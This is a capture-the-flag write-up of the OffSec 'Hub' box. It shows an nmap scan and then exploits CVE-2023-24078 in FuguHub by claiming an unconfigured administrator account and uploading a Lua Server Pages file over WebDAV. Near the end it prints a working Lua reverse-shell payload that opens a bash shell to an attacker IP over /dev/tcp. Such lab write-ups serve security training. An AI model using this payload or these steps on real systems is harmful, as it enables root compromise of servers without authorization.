Hub

Intro

Hub was classified as an 'Easy' box by OffSec, and follows a relatively straightforward attack path. After scanning open services, I identified a web application named 'FuguHub' with a known CVE (CVE-2023-24078, affecting versions 8.1 and lower): an unconfigured instance lets the first visitor register the administrator account, and that account can upload a Lua Server Pages file over WebDAV and execute it simply by requesting it. Exploiting this CVE resulted in a reverse shell with root access, because the web server itself runs as root.

Initial Foothold

Nmap Scan

I began by running an nmap scan to identify open ports:

# Nmap 7.94 scan initiated Fri Dec  8 10:25:10 2023 as: nmap -sC -sV -oA nmap/initial -vv hub.pg
Nmap scan report for hub.pg (192.168.210.25)
Host is up, received echo-reply ttl 61 (0.058s latency).
Scanned at 2023-12-08 10:25:11 CST for 22s
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUhhvrIBs53SApXKZYHWBlpH50KO3POt8Y+WvTvHZ5YgRagAEU5eSnGkrnziCUvDWNShFhLHI7kQv+mx+4R6Wk=
|   256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4MSEXnpONsc0ANUT6rFQPWsoVmRW4hrpSRq++xySM9
80/tcp   open  http     syn-ack ttl 61 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0
8082/tcp open  http     syn-ack ttl 61 Barracuda Embedded Web Server
|_http-favicon: Unknown favicon MD5: FDF624762222B41E2767954032B6F1FF
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   WebDAV type: Unknown
|   Server Date: Fri, 08 Dec 2023 16:25:29 GMT
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND PATCH POST PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
9999/tcp open  ssl/http syn-ack ttl 61 Barracuda Embedded Web Server
|_http-favicon: Unknown favicon MD5: FDF624762222B41E2767954032B6F1FF
|_http-title: Home
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   WebDAV type: Unknown
|   Server Date: Fri, 08 Dec 2023 16:25:30 GMT
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND PATCH POST PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Issuer: commonName=Real Time Logic Root CA/organizationName=Real Time Logic LLC/countryName=US/organizationalUnitName=SharkSSL/emailAddress=ginfo@realtimelogic.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-07-16T19:15:09
| Not valid after:  2074-04-18T19:15:09
| MD5:   6320:2067:19be:be32:18ce:3a61:e872:cc3f
| SHA-1: 503c:a62d:8a8c:f8c1:6555:ec50:77d1:73cc:0865:ec62
| -----BEGIN CERTIFICATE-----
| MIIEfDCCA2SgAwIBAgIBEDANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMx
| HDAaBgNVBAoTE1JlYWwgVGltZSBMb2dpYyBMTEMxETAPBgNVBAsTCFNoYXJrU1NM
| MSAwHgYDVQQDExdSZWFsIFRpbWUgTG9naWMgUm9vdCBDQTEmMCQGCSqGSIb3DQEJ
| ARYXZ2luZm9AcmVhbHRpbWVsb2dpYy5jb20wIBcNMTkwNzE2MTkxNTA5WhgPMjA3
| NDA0MTgxOTE1MDlaMDQxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlh
| MRAwDgYDVQQDDAdGdWd1SHViMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
| AQEA2uaLiecelbCvdPpZcmweQmK+rcxjFwKKx+ButcLc/vgDTbbDDsg9Pfn78RNE
| hrM1WsvkGXKgJY2M9tzTB6o27pUipwfYAA8a4mV7wfM+YGOVuC05t3oh3+GtSciQ
| ZNDEX3cSZ5XanKPNe9vNBNtFiC5ujadbsLWJxC4mHR9fnx3fPlhQO25QBcX+0M1h
| vOwsidZaqyl+R1zMOi/6IpJJobTJMRKT23N61q3ZKeJnZM2JK9H2srC8tRlIidpf
| Iu3Sv7St3Hg2VzbtlEDpGdISZTwpB+MIgvcZ2Z5IVfnhYJlQlNGHbg8jnegA07VE
| AsfkNlyMfVO88TCo5fLhE6wZLwIDAQABo4IBQDCCATwwHQYDVR0OBBYEFI5fqYOD
| ozZher2qQbU3//9gzTIyMIG1BgNVHSMEga0wgaqAFHlYmIP3mqIAiKOI3DxqZo3k
| KQKGoYGOpIGLMIGIMQswCQYDVQQGEwJVUzEcMBoGA1UEChMTUmVhbCBUaW1lIExv
| Z2ljIExMQzERMA8GA1UECxMIU2hhcmtTU0wxIDAeBgNVBAMTF1JlYWwgVGltZSBM
| b2dpYyBSb290IENBMSYwJAYJKoZIhvcNAQkBFhdnaW5mb0ByZWFsdGltZWxvZ2lj
| LmNvbYIBADAJBgNVHRMEAjAAMAsGA1UdDwQEAwIDqDAdBgNVHSUEFjAUBggrBgEF
| BQcDAgYIKwYBBQUHAwEwLAYDVR0RBCUwI4IHRnVndUh1YoINRnVndUh1Yi5sb2Nh
| bIIJbG9jYWxob3N0MA0GCSqGSIb3DQEBCwUAA4IBAQBsn2vzaK/2bKmWJ52FiRVw
| K3NxCqQrxHjXp2nJFc0S05XnCUqN5RbTgyhv0a8ODniaiJbXAaJC34Ot+v6UMeWE
| CHmZgjbZUvsrQiEUz+i0fegtwp+zgSOlb6t+g3lPGTzBjlFUfb0gaRSxSoI42apG
| QBwoN1haaHhm6THC7DIYmFiOgRiQfitiTf9FtbwTTfrLnVm3e3dCuwCmkcDgBZE1
| Q0M4pGSS3vWTQxF6oyYNe7mhtvGeG7qYE6amtF9iuiUt0MrH4hXTMfHcjHdRULgc
| 1a3vVPwl5CZsQRz40OPrQVtF7rcXRNWsU/1ze9r1sgeLxvjWmbW0GByKJ+jnHALy
|_-----END CERTIFICATE-----
|_http-server-header: BarracudaServer.com (Posix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec  8 10:25:33 2023 -- 1 IP address (1 host up) scanned in 22.64 seconds

This revealed OpenSSH 8.4p1 on port 22, nginx 1.18.0 on port 80 (answering with a 403), and two Barracuda Embedded Web Server instances on ports 8082 (plain HTTP) and 9999 (TLS). Two details in this output matter later: the certificate on 9999 already names the application (CN FuguHub, issued by a Real Time Logic root CA), and both Barracuda ports advertise the WebDAV write methods PUT, MKCOL, MOVE and DELETE, which is exactly what the file upload in the exploit relies on.

Examining HTTP Services

Performing a brief review of port 80, I was met with an HTTP 403 'Forbidden' response from nginx, and there was no robots.txt page available either.

Performing a brief review of port 9999, I was met with a page that appeared to be raw data which was not human readable. That is what a plain http:// request to a TLS port looks like: nmap identified 9999 as ssl/http, and its favicon hash, page title and server header match port 8082, so https://hub.pg:9999 (after accepting the self-signed certificate from the Real Time Logic root CA) is the same FuguHub application served over TLS.

Finally, reviewing port 8082, there appeared to be an instance of the 'FuguHub' web application hosted. After waiting on the landing page for a few seconds, I was prompted to create an Administrator account for this application. This is the root of the problem: the instance has never been set up, so any unauthenticated visitor can claim the administrator account, and every later step of the exploit runs as that account.

Exploiting FuguHub

Attempt #1

Searching for 'FuguHub' in searchsploit revealed a remote code execution exploit for versions 8.1 and lower of this application.

When I first reviewed this exploit, I did not entirely understand the attack path. Reviewing it in hindsight, it follows these steps:

  1. Check if an account already exists

  2. Create an account

  3. Login as the newly created account

  4. Upload a reverse shell file to the /fs/cmsdocs directory

  5. Send a GET request for the newly created file to trigger code execution

However, while the exploit accepted a command-line argument for the remote port that the application was hosted on, several portions of the exploit code still hard-coded 443 as the remote port. I attempted to modify the exploit code to honour the command-line argument, but was ultimately unable to get this to work.

Attempt #2

I found another exploit for CVE-2023-24078, which conveniently had a demo video on the README page of its GitHub repository. This exploit uses browser automation via Selenium to accomplish the following actions:

  • creating a reverse shell script in Lua (a Lua Server Pages .lsp file)

  • checking if an account already exists

  • creating an account

  • locating the filesharing component of the site, and

  • displaying the URL by which the file share can be accessed using a WebDAV client

The exploit then provides instructions to open the file share with the cadaver WebDAV client, change into the target directory, authenticate as the newly created administrative account, and upload the reverse shell script.

Once these actions are completed, the exploit script prompts you to start a netcat listener and press ENTER in the exploit's terminal. The script then sends an HTTP GET request for the uploaded reverse shell script, the server executes it as a Lua Server Page, and because the Barracuda server runs as root, we catch a root shell in our netcat listener! Note that the GET request itself never completes while the reverse shell is open, since os.execute() blocks until the spawned bash exits.

Reproducing the Exploit Manually

After I was able to get this final exploit script to work, I reviewed the actions it was taking and finally gained a better understanding of the attack path. Additionally, I was able to gain some insight from this writeup on the vulnerability, which I was linked to from the NIST National Vulnerability Database page on this CVE.

I was then able to reproduce the exploit through browser interactions after starting my netcat listener:

  • Navigate to the /fs directory and login as the admin account we created

  • Upload the Lua reverse shell script (lua-revshell.lsp) into the file share

  • Navigate to the /lua-revshell.lsp URI to trigger execution

The contents of the reverse shell I used are listed below:

<div style="margin-left: auto; margin-right: auto; width: 350px;">
 <div id="info">
 <h2>Lua Server Pages Reverse Shell</h2>
 <p>haha</p>
 </div>
 <!-- only a GET fires the shell; any other method just echoes its name back -->
 <?lsp if request:method() == "GET" then ?>
        <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.199/9001 0>&1'") ?>
 <?lsp else ?>
        you sent a <?lsp=request:method() ?> request
 <?lsp end ?>
 </div>

Privilege Escalation

No privilege escalation was required on this box, as our initial shell granted root access.
